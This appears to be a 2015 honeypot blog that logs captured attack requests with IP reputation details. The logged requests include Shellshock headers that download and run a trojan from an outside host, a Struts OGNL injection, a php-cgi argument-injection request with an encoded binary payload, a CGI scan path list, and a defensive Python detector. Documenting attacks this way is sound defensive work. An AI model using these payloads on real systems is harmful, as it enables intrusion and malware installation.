Wednesday, 30 September 2015

61.161.130.241 - ChinaZ attempt via 61.160.212.172

BEGIN OF HTTP DATA:
2015-09-30 11:05:18
Source IP: 61.161.130.241
Country: CN RiskScore: 1 Malware: []
GET / HTTP/1.1
Host: 109.234.106.8
Referer: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-tnci >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-tnci >> /tmp/Run.sh;echo /tmp/China.Z-tnci >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"
Accept:*/*
User-Agent: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-tnci >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-tnci >> /tmp/Run.sh;echo /tmp/China.Z-tnci >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"
Connection:Keep-Alive
I did not think I would see that again :-)
java: Linux.Trojan.Agent FOUND

61.161.130[.]241

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4837 CNCGROUP China169 Backbone
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/61.161.130.241

61.160.212[.]172

    Static Source: GeoIP data
  • Country: China
  • ASN: AS23650 AS Number for CHINANET jiangsu province backbone
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/61.160.212.172

 

Sunday, 27 September 2015

113.204.53.134 - com.opensymphony.xwork2.dispatcher

BEGIN OF HTTP DATA:
2015-09-26 14:05:03
Source IP: 113.204.53.134
Country: CN RiskScore: 1 Malware: []
POST /unAuthorizedAccess.action HTTP/1.1
User-Agent: Mozilla/5.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: 109.234.106.8
Content-Length: 395
Expect: 100-continue
Connection: Keep-Alive

redirect:${%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.setCharacterEncoding(%22UTF-8%22),%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res.getWriter().print(%22dir:%22),%23res.getWriter().println(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23res.getWriter().flush(),%23res.getWriter().close()}
URL-decoded, to make it easier to read:
redirect:${#res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#res.setCharacterEncoding("UTF-8"),#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#res.getWriter().print("dir:"),#res.getWriter().println(#req.getSession().getServletContext().getRealPath("/")),#res.getWriter().flush(),#res.getWriter().close()}
 

113.204.53[.]134

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4837 CNCGROUP China169 Backbone
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/113.204.53.134
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt?n=99999999999999999999

Monday, 21 September 2015

46.172.71.251 - simple bash injection

BEGIN OF HTTP DATA:
2015-09-21 20:45:43
Source IP: 46.172.71.251
Country: UA RiskScore: 10 Malware: []
GET /rom-0 HTTP/1.1
Host: 109.234.106.8
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Cookie: () { :;}; /bin/bash -c "ping 212.47.238.143 -c 1"
Connection: close
46.172.71[.]251
    Static Source: GeoIP data
  • Country: Ukraine
  • ASN: AS43110 Joint Ukrainian-American enterprise Ewropol with legal form Ltd
    Dynamic Source: IBM X-Force Exchange
  • Score: 8.6
  • Reference: https://exchange.xforce.ibmcloud.com/ip/46.172.71.251
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/46.172.71.251
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

94.180.115.102 - php Buffer overflow attempt

BEGIN OF HTTP DATA:
2015-09-22 03:24:28
Source IP: 94.180.115.102
Country: RU RiskScore: 1 Malware: []
POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: 195.169.125.87
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 43604
Connection: close
<?php
$bufferf = 'f0VMRgIBAQMAAAAAAAAAAAIAPgABAAAAEDwQAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAACAEAAAAAAAAEAAAAFAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAA5EMAAAAAAADkQwAAAAAAAAAAEAAAAAAAAQAAAAYAAADgmwAAAAAAAOCbUAAAAAAA4JtQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAB1k/mqVVBYIeAHDRYAAAAAYJ4AAGCeAAAAAgAAsAAAAAIAAAD7+yH/f0VMRgIBAQACAD4ADdAbQA+7ZL8XBQCglyITOADdsu67CAUbABoABg8FJwdA5IQ8IcABAAgA2GCT7gNwBHhABwIyIU8cAAAB+cAG9m+NB2SJADyTbQkAEDcGkJ6dkO8HUDAFN+ALN
The percent-encoded request line decodes to:

POST /cgi-bin/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env="yes"+-d+cgi.fix_pathinfo=1+-d+auto_prepend_file=php://input+-n HTTP/1.1
94.180.115[.]102
    Static Source: GeoIP data
  • Country: Russian Federation
  • ASN: AS43478 CJSC ER-Telecom Holding
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/94.180.115.102
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt
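
The decoded request line above is a list of php-cgi command-line switches. A CGI server only hands the query string to the program as arguments when it contains no unencoded "=", which is why the logged request sends every "=" as %3D. The following Python is an added example, not the blog author's tooling: it rebuilds the argument list from a request target and reports which security-relevant ini directives the request tries to override. The function names and the WATCHED list are assumptions of this example, and the sample target is rebuilt from the decoded switches shown above.

```python
from urllib.parse import unquote, urlsplit

# Directives whose override from the request line deserves an alert.
# All but auto_append_file appear in the decoded request above.
WATCHED = {
    "allow_url_include", "auto_prepend_file", "auto_append_file",
    "disable_functions", "open_basedir", "safe_mode",
    "cgi.force_redirect", "cgi.redirect_status_env", "suhosin.simulation",
}


def cgi_argv(target):
    """Arguments a CGI server would pass for this request target.

    The query string is split on '+' and decoded only when it holds no
    unencoded '='; otherwise nothing is passed on the command line.
    """
    query = urlsplit(target).query
    if not query or "=" in query:
        return []
    return [unquote(part) for part in query.split("+")]


def parse_switches(argv):
    """Split php-cgi style arguments into ({directive: value}, [other flags])."""
    directives, flags = {}, []
    i = 0
    while i < len(argv):
        arg = argv[i]
        if arg == "-d" and i + 1 < len(argv):      # "-d name=value"
            setting = argv[i + 1]
            i += 1
        elif arg.startswith("-d") and len(arg) > 2:  # "-dname=value"
            setting = arg[2:]
        else:
            if arg.startswith("-"):
                flags.append(arg)
            i += 1
            continue
        name, _, value = setting.partition("=")
        directives[name.strip()] = value.strip().strip('"')
        i += 1
    return directives, flags


def assess(target):
    """Summarise what a request target would do to a CGI-mode PHP binary."""
    argv = cgi_argv(target)
    directives, flags = parse_switches(argv)
    return {
        "argv": argv,
        "directives": directives,
        # A first argument starting with '-' means option injection.
        "suspicious": bool(argv) and argv[0].startswith("-"),
        "overrides": sorted(WATCHED & set(directives)),
        # -n tells PHP to ignore php.ini, so only the injected values apply.
        "ignores_php_ini": "-n" in flags,
        # php://input as prepend file means the POST body is run as PHP.
        "body_as_code": directives.get("auto_prepend_file", "").startswith("php://input"),
    }


def _pct(text):
    """Percent-encode every byte, the way the logged request did."""
    return "".join(f"%{b:02X}" for b in text.encode())


# Sample input rebuilt from the decoded request line shown above.
PAGE_ARGS = [
    "-d", "allow_url_include=on", "-d", "safe_mode=off",
    "-d", "suhosin.simulation=on", "-d", 'disable_functions=""',
    "-d", "open_basedir=none", "-d", "auto_prepend_file=php://input",
    "-d", "cgi.force_redirect=0", "-d", 'cgi.redirect_status_env="yes"',
    "-d", "cgi.fix_pathinfo=1", "-d", "auto_prepend_file=php://input", "-n",
]
SAMPLE_TARGET = "/cgi-bin/php?" + "+".join(_pct(a) for a in PAGE_ARGS)

if __name__ == "__main__":
    result = assess(SAMPLE_TARGET)
    for key in ("suspicious", "overrides", "ignores_php_ini", "body_as_code"):
        print(key, "=", result[key])
```
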


208.100.26.231 - fire on port 8080

BEGIN OF TOMCAT DATA:
2015-09-22 00:33:24
Source IP: 208.100.26.231
Country: US RiskScore: 1 Malware: []
^V^C^@^@S^A^@^@O^C^@?G<D7><F7><BA>,<EE><EA><B2>`~<F3>^@<FD><82>{<B9>Ֆ<C8>w<9B><E6><C4><DB><=<DB>o<EF>^Pn^@^@(^@^V^@^S^@
^@f^@^E^@^D^@e^@d^@c^@b^@a^@`^@^U^@^R^@ ^@^T^@^Q^@^H^@^F^@^C^A^@
 END OF DATA

BEGIN OF TOMCAT DATA:
2015-09-22 00:33:29
Source IP: 208.100.26.231
Country: US RiskScore: 1 Malware: []
^@^@^@qj<81>n0<81>k<A1>^C^B^A^E<A2>^C^B^A
<A4><81>^0\<A0>^G^C^E^@P<80>^@^P<A2>^DESC^BNM<A3>^W0^U<A0>^C^B^A^@<A1>^N0^LESC^FkrbtgtESC^BNM<A5>^Q^X^O19700101000000Z<A7>^F^B^D^_^^<B9>٨^W0^U^B^A^R^B^A^Q^B^A^P^B^A^W^B^A^A^B^A^C^B^A^B
 END OF DATA

BEGIN OF TOMCAT DATA:
2015-09-22 00:33:34
Source IP: 208.100.26.231
Country: US RiskScore: 1 Malware: []
^@^@^@<A4><FF>SMBr^@^@^@^@^H^A@^@^@^@^@^@^@^@^@^@^@^@^@^@^@@^F^@^@^A^@^@<81>^@^BPC NETWORK PROGRAM 1.0^@^BMICROSOFT NETWORKS 1.03^@^BMICROSOFT NETWORKS 3.0^@^BLANMAN1.0^@^BLM1.2X002^@^BSamba^@^BNT LANMAN 1.0^@^BNT LM 0.12^@
 END OF DATA
BEGIN OF TOMCAT DATA:
2015-09-22 00:34:26
Source IP: 208.100.26.231
Country: US RiskScore: 1 Malware: []
:^@^@^@/^@^@^@^B^@^@@^B^O^@^A^@=^E^@^@^@^@^@^@^@^@^@^@^@^@/^@^@^@^@^@^@^@^@^@@^_^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@
 END OF DATA

BEGIN OF TOMCAT DATA:
2015-09-22 00:34:31
Source IP: 208.100.26.231
Country: US RiskScore: 1 Malware: []
^A^@^@<FD><CE><FA>^K<B0><A0>^@^@^@MMS^T^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^R^@^@^@^A^@^C^@<F0><F0><F0><F0>^K^@^D^@^\^@^C^@N^@S^@P^@
l^@a^@y^@e^@r^@/^@9^@.^@0^@.^@0^@.^@2^@9^@8^@0^@;^@ ^@{^@0^@0^@0^@0^@A^@A^@0^@0^@-^@0^@A^@0^@0^@-^@0^@0^@a^@0^@-^@A^@A^@0^@A^@
-^@0^@0^@0^@0^@A^@0^@A^@A^@0^@A^@A^@0^@}^@^@^@<E0>m<DF>_
 END OF DATA

BEGIN OF TOMCAT DATA:
2015-09-22 00:34:37
Source IP: 208.100.26.231
Country: US RiskScore: 1 Malware: []
^@Z^@^@^A^@^@^@^A6^A,^@^@^H^@^?<FF>^?^H^@^@^@^A^@ ^@:^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@4<E6>^@^@^@^A^@^@^@^@^@^@^@^@(CONNECT_DAT
A=(COMMAND=version))
 END OF DATA
 
Although I am not able to read the exact attempts, there have been several different events.

208.100.26[.]231
    Static Source: GeoIP data
  • Country: United States
  • ASN: AS32748 Steadfast Networks
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/208.100.26.231
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt


Sunday, 20 September 2015

50.118.172.34 / 195.169.125.87 - HTTP javascript/html submission

BEGIN OF HTTP DATA:
2015-09-20 23:58:45
Source IP: 50.118.172.34
Country: US RiskScore: 1 Malware: []
GET /administrator/index.php HTTP/1.1
Host: 195.169.125.87
Accept-Language: en,en-us;q=0.7,es;q=0.3
User-Agent: Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Connection: close
Content-Type: text/html
Content-Length: 2221
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Charset: utf-8;q=0.7,*;q=0.7

<html><body><script type="text/javascript">ANCHORFREE_VERSION="413161526"</script><script type='text/javascript'>(function(){if(typeof(_AF2$runned)!='undefined'&&_AF2$runned==true){return}_AF2$={'SN':'HSSHIELD00ZZ','IP':'205.164.32.102','CH':'HSSCNL100714','CT':'0','HST':'&isUpdated=0','AFH':'hss498','RN':Math.floor(Math.random()*999),'TOP':(parent.location!=document.location||top.location!=document.location)?0:1,'AFVER':'4.18.2','FBW':'','FBWCNT':0};if(/^(.*,)?(11C)(,.*)?$/g.exec(_AF2$.CT)!=null){document.write("<scr"+"ipt src='http://box.anchorfree.net/insert/par.js?v="+ANCHORFREE_VERSION+"' type='text/javascript'></scr"+"ipt>")}document.write("<style type='text/css' title='AFc_css"+_AF2$.RN+"' >.AFc_body"+_AF2$.RN+"{} .AFc_all"+_AF2$.RN+",a.AFc_all"+_AF2$.RN+":hover,a.AFc_all"+_AF2$.RN+":visited{outline:none;background:transparent;border:none;margin:0;padding:0;top:0;left:0;text-decoration:none;overflow:hidden;display:block;z-index:666999;}</style>");})();</script><style type='text/css'>.AFhss_dpnone{display:none;width:0;height:0}</style><img src="about:blank"id="AFhss_trk"name="AFhss_trk"style="display:none"/><div id="AFhss_dfs"class="AFhss_dpnone"><div id="AFhss_adrp0"class="AFhss_dpnone"></div><div id="AFhss_adrp1"class="AFhss_dpnone"></div><div id="AFhss_adrp2"class="AFhss_dpnone"></div><div id="AFhss_adrp3"class="AFhss_dpnone"></div><div id="AFhss_adrp4"class="AFhss_dpnone"></div><div id="AFhss_adrp5"class="AFhss_dpnone"></div><div id="AFhss_adrp6"class="AFhss_dpnone"></div><div id="AFhss_adrp7"class="AFhss_dpnone"></div><div id="AFhss_adrp8"class="AFhss_dpnone"></div><div id="AFhss_adrp9"class="AFhss_dpnone"></div></div><script 
type='text/javascript'>(function(){if(typeof(_AF2$runned)!='undefined'&&_AF2$runned==true){return}_AF2$={'SN':'HSSHIELD00ZZ','IP':'205.164.32.102','CH':'HSSCNL100714','CT':'0','HST':'&isUpdated=0','AFH':'hss498','RN':Math.floor(Math.random()*999),'TOP':(parent.location!=document.location||top.location!=document.location)?0:1,'AFVER':'4.18.2','FBW':'','FBWCNT':0};if(_AF2$.TOP==1){document.write("<scr"+"ipt src='http://box.anchorfree.net/insert/41.js?v="+ANCHORFREE_VERSION+"' type='text/javascript'></scr"+"ipt>")}})()</script>Hello World</body></html>
50.118.172[.]34
    Static Source: GeoIP data
  • Country: United States
  • ASN: AS21321 Areti Internet Ltd.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/50.118.172.34

195.169.125[.]87
    Static Source: GeoIP data
  • Country: Netherlands
  • ASN: AS1103 SURFnet, The Netherlands
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/195.169.125.87

205.164.32[.]102
    Static Source: GeoIP data
  • Country: United States
  • ASN: AS21321 Areti Internet Ltd.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/205.164.32.102

Monday, 14 September 2015

195.141.90.114 - M'expr 1330 +7 and 1344 - 7

BEGIN OF HTTP DATA:
2015-09-14 23:55:34
Source IP: 195.141.90.114
Country: CH RiskScore: 1 Malware: []
GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;id;echo @ HTTP/1.0
Host: oc.johest.de
Cookie: () { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;id;echo @
User-Agent: () { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;id;echo @
Referer: () { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;id;echo @
Although I find it a bit funny to find 1337 in my logs, I believe it should not be there :-)

195.141.90[.]114
    Static Source: GeoIP data
  • Country: Switzerland
  • ASN: AS6730 Sunrise Communications AG
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/195.141.90.114
The following requests have been seen in this kind of attack.

GET / HTTP/1.0
GET /admin.cgi HTTP/1.0
GET /administrator.cgi HTTP/1.0
GET /agora.cgi HTTP/1.0
GET /aktivate/cgi-bin/catgy.cgi HTTP/1.0
GET /analyse.cgi HTTP/1.0
GET /apps/web/vs_diag.cgi HTTP/1.0
GET /axis-cgi/buffer/command.cgi HTTP/1.0
GET /b2-include/b2edit.showposts.php HTTP/1.0
GET /bandwidth/index.cgi HTTP/1.0
GET /bigconf.cgi HTTP/1.0
GET /cartcart.cgi HTTP/1.0
GET /cart.cgi HTTP/1.0
GET /catalog/index.cgi HTTP/1.0
GET /ccbill/whereami.cgi HTTP/1.0
GET /cgi-bin/ HTTP/1.0
GET /cgi-bin/14all-1.1.cgi HTTP/1.0
GET /cgi-bin/14all.cgi HTTP/1.0
GET /cgi-bin/%2f/admin.html HTTP/1.0
GET /cgi-bin/a1disp3.cgi HTTP/1.0
GET /cgi-bin/a1stats/a1disp3.cgi HTTP/1.0
GET /cgi-bin/a1stats/a1disp4.cgi HTTP/1.0
GET /cgi-bin/addbanner.cgi HTTP/1.0
GET /cgi-bin/add_ftp.cgi HTTP/1.0
GET /cgi-bin/adduser.cgi HTTP/1.0
GET /cgi-bin/admin/admin.cgi HTTP/1.0
GET /cgi-bin/admin.cgi HTTP/1.0
GET /cgi-bin/adminhot.cgi HTTP/1.0
GET /cgi-bin/admin.html HTTP/1.0
GET /cgi-bin/admin.pl HTTP/1.0
GET /cgi-bin/admin/setup.cgi HTTP/1.0
GET /cgi-bin/adminwww.cgi HTTP/1.0
GET /cgi-bin/af.cgi HTTP/1.0
GET /cgi-bin/aglimpse.cgi HTTP/1.0
GET /cgi-bin/alienform.cgi HTTP/1.0
GET /cgi-bin/AnyBoard.cgi HTTP/1.0
GET /cgi-bin/architext_query.cgi HTTP/1.0
GET /cgi-bin/astrocam.cgi HTTP/1.0
GET /cgi-bin/AT-admin.cgi HTTP/1.0
GET /cgi-bin/AT-generate.cgi HTTP/1.0
GET /cgi-bin/auction/auction.cgi HTTP/1.0
GET /cgi-bin/auktion.cgi HTTP/1.0
GET /cgi-bin/authLogin.cgi HTTP/1.0
GET /cgi-bin/ax-admin.cgi HTTP/1.0
GET /cgi-bin/ax.cgi HTTP/1.0
GET /cgi-bin/axs.cgi HTTP/1.0
GET /cgi-bin/badmin.cgi HTTP/1.0
GET /cgi-bin/banner.cgi HTTP/1.0
GET /cgi-bin/bannereditor.cgi HTTP/1.0
GET /cgi-bin/bash HTTP/1.0
GET /cgi-bin/bb-ack.sh HTTP/1.0
GET /cgi-bin/bb-histlog.sh HTTP/1.0
GET /cgi-bin/bb-hist.sh HTTP/1.0
GET /cgi-bin/bb-hostsvc.sh HTTP/1.0
GET /cgi-bin/bb-replog.sh HTTP/1.0
GET /cgi-bin/bb-rep.sh HTTP/1.0
GET /cgi-bin/BBS/bbs_forum.cgi HTTP/1.0
GET /cgi-bin/bbs_forum.cgi HTTP/1.0
GET /cgi-bin/bigconf.cgi HTTP/1.0
GET /cgi-bin/bizdb1-search.cgi HTTP/1.0
GET /cgi-bin/blog/mt-check.cgi HTTP/1.0
GET /cgi-bin/blog/mt-load.cgi HTTP/1.0
GET /cgi-bin/bnbform.cgi HTTP/1.0
GET /cgi-bin/book.cgi HTTP/1.0
GET /cgi-bin/boozt/admin/index.cgi HTTP/1.0
GET /cgi-bin/bsguest.cgi HTTP/1.0
GET /cgi-bin/bslist.cgi HTTP/1.0
GET /cgi-bin/build.cgi HTTP/1.0
GET /cgi-bin/bulk/bulk.cgi HTTP/1.0
GET /cgi-bin/cached_feed.cgi HTTP/1.0
GET /cgi-bin/cachemgr.cgi HTTP/1.0
GET /cgi-bin/calendar/index.cgi HTTP/1.0
GET /cgi-bin/cartmanager.cgi HTTP/1.0
GET /cgi-bin/cbmc/forums.cgi HTTP/1.0
GET /cgi-bin/ccvsblame.cgi HTTP/1.0
GET /cgi-bin/c_download.cgi HTTP/1.0
GET /cgi-bin/cgforum.cgi HTTP/1.0
GET /cgi-bin/cgi.cgi HTTP/1.0
GET /cgi-bin/cgi_process HTTP/1.0
GET /cgi-bin/classified.cgi HTTP/1.0
GET /cgi-bin/classifieds.cgi HTTP/1.0
GET /cgi-bin/classifieds/classifieds.cgi HTTP/1.0
GET /cgi-bin/classifieds/index.cgi HTTP/1.0
GET /cgi-bin/.cobalt/alert/service.cgi HTTP/1.0
GET /cgi-bin/.cobalt/message/message.cgi HTTP/1.0
GET /cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi HTTP/1.0
GET /cgi-bin/commandit.cgi HTTP/1.0
GET /cgi-bin/commerce.cgi HTTP/1.0
GET /cgi-bin/common/listrec.pl HTTP/1.0
GET /cgi-bin/compatible.cgi HTTP/1.0
GET /cgi-bin/contact.cgi HTTP/1.0
GET /cgi-bin/Count.cgi HTTP/1.0
GET /cgi-bin/csChatRBox.cgi HTTP/1.0
GET /cgi-bin/csGuestBook.cgi HTTP/1.0
GET /cgi-bin/csLiveSupport.cgi HTTP/1.0
GET /cgi-bin/CSMailto.cgi HTTP/1.0
GET /cgi-bin/CSMailto/CSMailto.cgi HTTP/1.0
GET /cgi-bin/csNews.cgi HTTP/1.0
GET /cgi-bin/csNewsPro.cgi HTTP/1.0
GET /cgi-bin/csPassword.cgi HTTP/1.0
GET /cgi-bin/csPassword/csPassword.cgi HTTP/1.0
GET /cgi-bin/csSearch.cgi HTTP/1.0
GET /cgi-bin/csv_db.cgi HTTP/1.0
GET /cgi-bin/cvsblame.cgi HTTP/1.0
GET /cgi-bin/cvslog.cgi HTTP/1.0
GET /cgi-bin/cvsquery.cgi HTTP/1.0
GET /cgi-bin/cvsqueryform.cgi HTTP/1.0
GET /cgi-bin/day5datacopier.cgi HTTP/1.0
GET /cgi-bin/day5datanotifier.cgi HTTP/1.0
GET /cgi-bin/db_manager.cgi HTTP/1.0
GET /cgi-bin/dbman/db.cgi HTTP/1.0
GET /cgi-bin/dcforum.cgi HTTP/1.0
GET /cgi-bin/defaultwebpage.cgi HTTP/1.0
GET /cgi-bin/dfire.cgi HTTP/1.0
GET /cgi-bin/diagnose.cgi HTTP/1.0
GET /cgi-bin/dig.cgi HTTP/1.0
GET /cgi-bin/directorypro.cgi HTTP/1.0
GET /cgi-bin/download.cgi HTTP/1.0
GET /cgi-bin/emu/html/emumail.cgi HTTP/1.0
GET /cgi-bin/emumail.cgi HTTP/1.0
GET /cgi-bin/emumail/emumail.cgi HTTP/1.0
GET /cgi-bin/enter.cgi HTTP/1.0
GET /cgi-bin/env.cgi HTTP/1.0
GET /cgi-bin/environ.cgi HTTP/1.0
GET /cgi-bin/ezadmin.cgi HTTP/1.0
GET /cgi-bin/ezboard.cgi HTTP/1.0
GET /cgi-bin/ezman.cgi HTTP/1.0
GET /cgi-bin/ezshopper2/loadpage.cgi HTTP/1.0
GET /cgi-bin/ezshopper3/loadpage.cgi HTTP/1.0
GET /cgi-bin/ezshopper/loadpage.cgi HTTP/1.0
GET /cgi-bin/ezshopper/search.cgi HTTP/1.0
GET /cgi-bin/faqmanager.cgi HTTP/1.0
GET /cgi-bin/FileSeek2.cgi HTTP/1.0
GET /cgi-bin/FileSeek.cgi HTTP/1.0
GET /cgi-bin/finger.cgi HTTP/1.0
GET /cgi-bin/firmwarecfg HTTP/1.0
GET /cgi-bin/flexform.cgi HTTP/1.0
GET /cgi-bin/fom.cgi HTTP/1.0
GET /cgi-bin/fom/fom.cgi HTTP/1.0
GET /cgi-bin/FormHandler.cgi HTTP/1.0
GET /cgi-bin/FormMail.cgi HTTP/1.0
GET /cgi-bin/forum.cgi HTTP/1.0
GET /cgi-bin/gbadmin.cgi HTTP/1.0
GET /cgi-bin/gbook/gbook.cgi HTTP/1.0
GET /cgi-bin/generate.cgi HTTP/1.0
GET /cgi-bin/getdoc.cgi HTTP/1.0
GET /cgi-bin/gH.cgi HTTP/1.0
GET /cgi-bin/gm-authors.cgi HTTP/1.0
GET /cgi-bin/gm.cgi HTTP/1.0
GET /cgi-bin/gm-cplog.cgi HTTP/1.0
GET /cgi-bin/guestbook.cgi HTTP/1.0
GET /cgi-bin/handler HTTP/1.0
GET /cgi-bin/handler.cgi HTTP/1.0
GET /cgi-bin/handler/netsonar HTTP/1.0
GET /cgi-bin/hello HTTP/1.0
GET /cgi-bin/hello.cgi HTTP/1.0
GET /cgi-bin/helpme HTTP/1.0
GET /cgi-bin/hitview.cgi HTTP/1.0
GET /cgi-bin/hsx.cgi HTTP/1.0
GET /cgi-bin/html2chtml.cgi HTTP/1.0
GET /cgi-bin/html2wml.cgi HTTP/1.0
GET /cgi-bin/htsearch.cgi HTTP/1.0
GET /cgi-bin/icat HTTP/1.0
GET /cgi-bin/ICuGI/EST/blast_detail.cgi HTTP/1.0
GET /cgi-bin/if/admin/nph-build.cgi HTTP/1.0
GET /cgi-bin/ikonboard/help.cgi HTTP/1.0
GET /cgi-bin/ImageFolio/admin/admin.cgi HTTP/1.0
GET /cgi-bin/imageFolio.cgi HTTP/1.0
GET /cgi-bin/index.cgi HTTP/1.0
GET /cgi-bin/info.sh HTTP/1.0
GET /cgi-bin/infosrch.cgi HTTP/1.0
GET /cgi-bin/jammail.pl HTTP/1.0
GET /cgi-bin/journal.cgi HTTP/1.0
GET /cgi-bin/lastlines.cgi HTTP/1.0
GET /cgi-bin/loadpage.cgi HTTP/1.0
GET /cgi-bin/login.cgi HTTP/1.0
GET /cgi-bin/logit.cgi HTTP/1.0
GET /cgi-bin/log-reader.cgi HTTP/1.0
GET /cgi-bin/lookwho.cgi HTTP/1.0
GET /cgi-bin/lwgate.cgi HTTP/1.0
GET /cgi-bin/MachineInfo HTTP/1.0
GET /cgi-bin/magiccard.cgi HTTP/1.0
GET /cgi-bin/mail/emumail.cgi HTTP/1.0
GET /cgi-bin/maillist.cgi HTTP/1.0
GET /cgi-bin/mailnews.cgi HTTP/1.0
GET /cgi-bin/mail/nph-mr.cgi HTTP/1.0
GET /cgi-bin/main.cgi HTTP/1.0
GET /cgi-bin/main_menu.pl HTTP/1.0
GET /cgi-bin/man.sh HTTP/1.0
GET /cgi-bin/meme.cgi HTTP/1.0
GET /cgi-bin/mini_logger.cgi HTTP/1.0
GET /cgi-bin/mmstdod.cgi HTTP/1.0
GET /cgi-bin/moin.cgi HTTP/1.0
GET /cgi-bin/mojo/mojo.cgi HTTP/1.0
GET /cgi-bin/mrtg.cgi HTTP/1.0
GET /cgi-bin/mt/mt-check.cgi HTTP/1.0
